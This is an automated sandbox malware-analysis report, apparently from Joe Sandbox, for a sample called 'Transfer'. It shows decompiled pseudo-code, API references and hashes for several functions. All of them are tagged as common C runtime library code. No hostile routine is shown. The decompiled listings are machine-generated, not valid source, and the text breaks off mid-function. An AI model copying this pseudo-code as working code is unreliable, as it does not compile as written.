0x0088ad6b
0x0088ad70
0x0088ad76
0x0088ad7c
0x0088ad8b
0x0088ad91
0x0088ad97
0x0088ad9c
0x0088adb8
0x0088ae2b
0x0088ae31
0x0088adba
0x0088adc2
0x0088adcb
0x0088add1
0x00000000
0x0088add3
0x0088add5
0x0088add8
0x0088adf1
0x00000000
0x0088adf3
0x0088adf7
0x0088adf9
0x0088adfc
0x00000000
0x0088adfc
0x0088adf7
0x0088adf1
0x0088add1
0x0088adcb
0x0088adb8
0x0088ad9c
0x0088ad76
0x00000000
0x0088adff
0x0088adff
0x0088ae33
0x0088ae45

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0088B408,?,00000000,?,00000000,00000000), ref: 0088ACD5
__fassign.LIBCMT ref: 0088AD50
__fassign.LIBCMT ref: 0088AD6B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0088AD91
WriteFile.KERNEL32(?,?,00000000,0088B408,00000000,?,?,?,?,?,?,?,?,?,0088B408,?), ref: 0088ADB0
WriteFile.KERNEL32(?,?,00000001,0088B408,00000000,?,?,?,?,?,?,?,?,?,0088B408,?), ref: 0088ADE9

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 339eec01beb9cc487a59ef5b73cc40bf378bd835e6788ccb1947999e95b6c4fc
Instruction ID: d249d045116406323bb1e91b2cf31d7d5b08c37aea0db908f63c2e9d5a0c7cd7
Opcode Fuzzy Hash: 339eec01beb9cc487a59ef5b73cc40bf378bd835e6788ccb1947999e95b6c4fc
Instruction Fuzzy Hash: 2551B2B190024A9FDB14DFA8DC85AEEBBF9FF09300F14455BE951E7291D730A941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00888C93 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00888C93(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00888C57(_t45, 7);
					E00888C57(_t45 + 0x1c, 7);
					E00888C57(_t45 + 0x38, 0xc);
					E00888C57(_t45 + 0x68, 0xc);
					E00888C57(_t45 + 0x98, 2);
					E00886B10( *((intOrPtr*)(_t45 + 0xa0)));
					E00886B10( *((intOrPtr*)(_t45 + 0xa4)));
					E00886B10( *((intOrPtr*)(_t45 + 0xa8)));
					E00888C57(_t45 + 0xb4, 7);
					E00888C57(_t45 + 0xd0, 7);
					E00888C57(_t45 + 0xec, 0xc);
					E00888C57(_t45 + 0x11c, 0xc);
					E00888C57(_t45 + 0x14c, 2);
					E00886B10( *((intOrPtr*)(_t45 + 0x154)));
					E00886B10( *((intOrPtr*)(_t45 + 0x158)));
					E00886B10( *((intOrPtr*)(_t45 + 0x15c)));
					return E00886B10( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00888c99
0x00888c9e
0x00888ca7
0x00888cb2
0x00888cbd
0x00888cc8
0x00888cd6
0x00888ce1
0x00888cec
0x00888cf7
0x00888d05
0x00888d13
0x00888d24
0x00888d32
0x00888d40
0x00888d4b
0x00888d56
0x00888d61
0x00000000
0x00888d71
0x00888d76

APIs

Part of subcall function 00888C57: _free.LIBCMT ref: 00888C80

_free.LIBCMT ref: 00888CE1

Part of subcall function 00886B10: HeapFree.KERNEL32(00000000,00000000,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?), ref: 00886B26
Part of subcall function 00886B10: GetLastError.KERNEL32(?,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?,?), ref: 00886B38

_free.LIBCMT ref: 00888CEC
_free.LIBCMT ref: 00888CF7
_free.LIBCMT ref: 00888D4B
_free.LIBCMT ref: 00888D56
_free.LIBCMT ref: 00888D61
_free.LIBCMT ref: 00888D6C

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0bb379ea52c51a684ff9bb70345eabbbe80e5a958499be13c44c1439a6277fea
Instruction ID: 7c0a88156bc86819044779d47dda9dc6c986b3e5eb4416efc3176222920945eb
Opcode Fuzzy Hash: 0bb379ea52c51a684ff9bb70345eabbbe80e5a958499be13c44c1439a6277fea
Instruction Fuzzy Hash: 35112971641B04FADA60BBB4CC06FCB779DFF10700F800C19B299E6092EE75B5648762

Uniqueness

Uniqueness Score: -1.00%

Function 00884AE0 Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00884AE0(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x896020 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0088534E(__eflags,  *0x896020);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00885388(__eflags,  *0x896020, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E00886BDB(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00885388(__eflags,  *0x896020, 0);
								} else {
									__eflags = E00885388(__eflags,  *0x896020, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00886B10(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x00884ae7
0x00884afa
0x00884b01
0x00884b04
0x00884b07
0x00884b20
0x00884b20
0x00884b09
0x00884b09
0x00884b0b
0x00884b15
0x00884b1b
0x00884b1c
0x00884b1e
0x00884b2e
0x00884b32
0x00884b34
0x00884b48
0x00884b48
0x00884b51
0x00884b36
0x00884b44
0x00884b46
0x00884b5a
0x00884b5c
0x00884b5c
0x00000000
0x00000000
0x00000000
0x00884b46
0x00884b5f
0x00000000
0x00000000
0x00000000
0x00884b1e
0x00884b0b
0x00884b67
0x00884b71
0x00884ae9
0x00884aeb
0x00884aeb

APIs

GetLastError.KERNEL32(?,?,00884AD7,00883E74,008944D8,00000010,0088363C,?,?,?,?,?,00000000,?), ref: 00884AEE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00884AFC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00884B15
SetLastError.KERNEL32(00000000,00884AD7,00883E74,008944D8,00000010,0088363C,?,?,?,?,?,00000000,?), ref: 00884B67

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1e4c78751d218e827ae7ad49166287ca28bd10fda6fe818bd89b3fa65dcb7422
Instruction ID: 7aeb59b84a65b885731b36a21eb3675ec9f7be0ab29c42c93b9626457226bc26
Opcode Fuzzy Hash: 1e4c78751d218e827ae7ad49166287ca28bd10fda6fe818bd89b3fa65dcb7422
Instruction Fuzzy Hash: 6A01D433608B265EE7343BB87CC5B6A6A98FF153B5720032AF121D61E1FF518C215345

Uniqueness

Uniqueness Score: -1.00%

Function 0088702E Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E0088702E(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0x896044; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00886BDB(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E008883D2(_t20, _t25, _t31, __eflags,  *0x896044, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00886E9F(_t25, _t31, 0x89734c);
							E00886B10(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00886B10();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00886B98(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x896044; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00886BDB(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E008883D2(_t21, _t27, _t32, __eflags,  *0x896044, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00886E9F(_t27, _t32, 0x89734c);
									E00886B10(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00886B10();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0088837C(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0088837C(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x0088702e
0x0088702e
0x0088702e
0x00887031
0x00887038
0x0088703a
0x0088703f
0x00887042
0x00887050
0x00887057
0x0088705c
0x0088705f
0x00887062
0x00887074
0x00887079
0x0088707b
0x00887086
0x0088708d
0x00887092
0x00887095
0x00887097
0x00000000
0x00000000
0x00000000
0x00000000
0x0088707d
0x0088707d
0x00000000
0x0088707d
0x00887064
0x00887064
0x00887065
0x00887065
0x0088706a
0x008870a5
0x008870a6
0x008870ac
0x008870b1
0x008870b4
0x008870b5
0x008870b6
0x008870bd
0x008870bf
0x008870c1
0x008870c6
0x008870c9
0x008870d7
0x008870e3
0x008870e6
0x008870e9
0x008870fb
0x00887100
0x00887102
0x0088710d
0x00887113
0x0088711b
0x0088711d
0x00000000
0x00000000
0x00000000
0x00000000
0x00887104
0x00887104
0x00000000
0x00887104
0x008870eb
0x008870eb
0x008870ec
0x008870ec
0x0088711f
0x00887120
0x00887120
0x008870cb
0x008870d1
0x008870d5
0x00887128
0x00887129
0x0088712f
0x00000000
0x00000000
0x00000000
0x008870d5
0x00887136
0x00887136
0x00887044
0x0088704a
0x0088704e
0x00887099
0x0088709a
0x008870a4
0x00000000
0x00000000
0x00000000
0x0088704e

APIs

GetLastError.KERNEL32(?,?,00886A8B,008946C0,0000000C,00882F63), ref: 00887032
_free.LIBCMT ref: 00887065
_free.LIBCMT ref: 0088708D
SetLastError.KERNEL32(00000000), ref: 0088709A
SetLastError.KERNEL32(00000000), ref: 008870A6
_abort.LIBCMT ref: 008870AC

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: f2eb93deaab5a9f43233f2226e4292d696e84d29b04e8af09fd0e7522975b9ed
Instruction ID: 3c98717e1d5b2530b6ac7e2525402dd5852bf87e4249188425c1222927aa174c
Opcode Fuzzy Hash: f2eb93deaab5a9f43233f2226e4292d696e84d29b04e8af09fd0e7522975b9ed
Instruction Fuzzy Hash: B9F04435108E00AAD632733C6C5AB1A266AFFC1775F350125F514E6292FE24DC115362

Uniqueness

Uniqueness Score: -1.00%

Function 008862ED Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0088629E,00000003,?,0088623E,00000003,00894638,0000000C,00886395,00000003,00000002), ref: 0088630D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00886320
FreeLibrary.KERNEL32(00000000,?,?,?,0088629E,00000003,?,0088623E,00000003,00894638,0000000C,00886395,00000003,00000002,00000000), ref: 00886343

Strings

mscoree.dll, xrefs: 00886306
CorExitProcess, xrefs: 00886318

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1315d6bad7d4780f371bc55da0f343e3fc4ce6fefef0212a99b5b2d9c05fed53
Instruction ID: 23b2946ef3183331b37031176ad5de591668ab0a8cc6765c7a078d396b808f95
Opcode Fuzzy Hash: 1315d6bad7d4780f371bc55da0f343e3fc4ce6fefef0212a99b5b2d9c05fed53
Instruction Fuzzy Hash: 89F03C74A00609EBCB11AB94ED09BADBFA4FF44711F000169B905E22A2DB348950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00886731 Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00886731(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x896004; // 0x239cc77c
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0088611D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00882A2D(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00882A2D(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00882A2D(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0088928A(_t56);
						_t40 = E00886B10(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0088928A(_t56);
						E00886B10(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x896004;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00886731
0x0088673b
0x0088673f
0x00886741
0x00886745
0x0088674f
0x00886760
0x00886765
0x00886767
0x00886769
0x0088676b
0x0088676d
0x00886771
0x0088682b
0x00886839
0x0088683b
0x00886840
0x00886847
0x00886849
0x00886857
0x00886866
0x00886869
0x0088686b
0x00000000
0x0088686c
0x00886779
0x0088677e
0x00886783
0x00886785
0x00886785
0x00886787
0x0088678c
0x00886790
0x00886790
0x00886793
0x008867b2
0x008867b2
0x008867b4
0x008867b7
0x008867c0
0x008867c3
0x008867c8
0x008867cb
0x008867d0
0x00000000
0x00000000
0x008867d2
0x00000000
0x00886795
0x00886795
0x00886797
0x008867a0
0x008867a3
0x008867a8
0x008867ab
0x008867b0
0x008867da
0x008867dd
0x008867df
0x008867e2
0x008867ea
0x008867f0
0x008867f7
0x008867f9
0x00886801
0x00886810
0x00886814
0x00886816
0x00886819
0x00000000
0x00000000
0x0088681b
0x0088681e
0x00886820
0x00886820
0x00886821
0x00886823
0x00886826
0x00000000
0x00886820
0x00000000
0x008867b0
0x00886793
0x00000000

APIs

_free.LIBCMT ref: 008867A3
_free.LIBCMT ref: 008867C3

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e9ec16dd6e55f92697adf342ff27d771616b729d71ad8f6dd80edc497727655e
Instruction ID: 05bfdb154b039dd74b9edc065a8494149d0929d05347308fa58a08e33f184b96
Opcode Fuzzy Hash: e9ec16dd6e55f92697adf342ff27d771616b729d71ad8f6dd80edc497727655e
Instruction Fuzzy Hash: 3641B272A006149FCB24FF78C881A6AB7E5FF88718F1545A9E515EB342EB31AD11CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00888DBC Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00888DBC(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t54;
				int _t56;
				signed int _t62;
				int _t65;
				short* _t66;
				signed int _t67;
				short* _t68;

				_t34 =  *0x896004; // 0x239cc77c
				_v8 = _t34 ^ _t67;
				E00886C38(_t54,  &_v28, __edx, _a4);
				_t56 = _a24;
				if(_t56 == 0) {
					_t53 =  *(_v24 + 8);
					_t56 = _t53;
					_a24 = _t53;
				}
				_t65 = 0;
				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E008825A8(_t54, _v8 ^ _t67, _t65, _t66);
				}
				_t54 = _t40 + _t40;
				_t17 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t66 = 0;
					L11:
					if(_t66 != 0) {
						E00884940(_t65, _t66, _t65, _t54);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
						if(_t46 != 0) {
							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
						}
					}
					L14:
					E00888ED9(_t66);
					goto L15;
				}
				_t20 = _t54 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t54 + 8; // 0x8
				_t62 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t66 = E00886B4A(_t62, _t48 & _t62);
					if(_t66 == 0) {
						goto L14;
					}
					 *_t66 = 0xdddd;
					L9:
					_t66 =  &(_t66[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0088D5B0();
				_t66 = _t68;
				if(_t66 == 0) {
					goto L14;
				}
				 *_t66 = 0xcccc;
				goto L9;
			}

0x00888dc4
0x00888dcb
0x00888dd7
0x00888ddc
0x00888de1
0x00888de6
0x00888de9
0x00888deb
0x00888deb
0x00888df0
0x00888e09
0x00888e0f
0x00888e14
0x00888eb3
0x00888eb7
0x00888ebc
0x00888ebc
0x00888ed8
0x00888ed8
0x00888e1a
0x00888e1d
0x00888e22
0x00888e26
0x00888e72
0x00888e74
0x00888e76
0x00888e7b
0x00888e92
0x00888e9a
0x00888eaa
0x00888eaa
0x00888e9a
0x00888eac
0x00888ead
0x00000000
0x00888eb2
0x00888e28
0x00888e2d
0x00888e2f
0x00888e31
0x00888e31
0x00888e39
0x00888e56
0x00888e60
0x00888e65
0x00000000
0x00000000
0x00888e67
0x00888e6d
0x00888e6d
0x00000000
0x00888e6d
0x00888e3d
0x00888e41
0x00888e46
0x00888e4a
0x00000000
0x00000000
0x00888e4c
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00888E09
__alloca_probe_16.LIBCMT ref: 00888E41
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00888E92
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00888EA4
__freea.LIBCMT ref: 00888EAD

Part of subcall function 00886B4A: RtlAllocateHeap.NTDLL(00000000,0088330B,?), ref: 00886B7C

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 6a9b041a4da66ce9b7ae7a90a3e8819340b3505aa5ca105bf445776ef444bbf2
Instruction ID: 9084a225e7d2849af419914a1a40c630bc833c7d7fc65da5da846df87aab9300
Opcode Fuzzy Hash: 6a9b041a4da66ce9b7ae7a90a3e8819340b3505aa5ca105bf445776ef444bbf2
Instruction Fuzzy Hash: 55318C72A1020AAFDB25AF68DC85DAF7BA5FB40710B440168FC05DA191EB35DD64CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008870B2 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E008870B2(void* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x896044; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00886BDB(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E008883D2(_t10, _t13, _t16, __eflags,  *0x896044, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00886E9F(_t13, _t16, 0x89734c);
							E00886B10(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00886B10();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E0088837C(0, _t11, _t15, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x008870b2
0x008870bd
0x008870bf
0x008870c1
0x008870c6
0x008870c9
0x008870d7
0x008870e3
0x008870e6
0x008870e9
0x008870fb
0x00887100
0x00887102
0x0088710d
0x00887113
0x0088711b
0x0088711d
0x00000000
0x00000000
0x00000000
0x00000000
0x00887104
0x00887104
0x00000000
0x00887104
0x008870eb
0x008870eb
0x008870ec
0x008870ec
0x0088711f
0x00887120
0x00887120
0x008870cb
0x008870d1
0x008870d5
0x00887128
0x00887129
0x0088712f
0x00000000
0x00000000
0x00000000
0x008870d5
0x00887136

APIs

GetLastError.KERNEL32(0088330B,0088330B,?,008873D7,00886B8D,?,?,008847F0,?,?,00000000,?,?,0088322E,0088330B,?), ref: 008870B7
_free.LIBCMT ref: 008870EC
_free.LIBCMT ref: 00887113
SetLastError.KERNEL32(00000000,?,0088330B), ref: 00887120
SetLastError.KERNEL32(00000000,?,0088330B), ref: 00887129

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b590ebe2bedd38c7d59d659b981b291ce20f5ddb1d1ec518aaa2c7f94a802f82
Instruction ID: ee8b839a7317aec11dfb9923de4f69173ae77005882ed7e6f4b98c79422f2ec3
Opcode Fuzzy Hash: b590ebe2bedd38c7d59d659b981b291ce20f5ddb1d1ec518aaa2c7f94a802f82
Instruction Fuzzy Hash: 5001813A248A00AA862273386C8992B367DFFD5779B340125FA15E2293FE68C8115322

Uniqueness

Uniqueness Score: -1.00%

Function 00888BEE Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00888BEE(intOrPtr* _a4) {
				intOrPtr _t6;
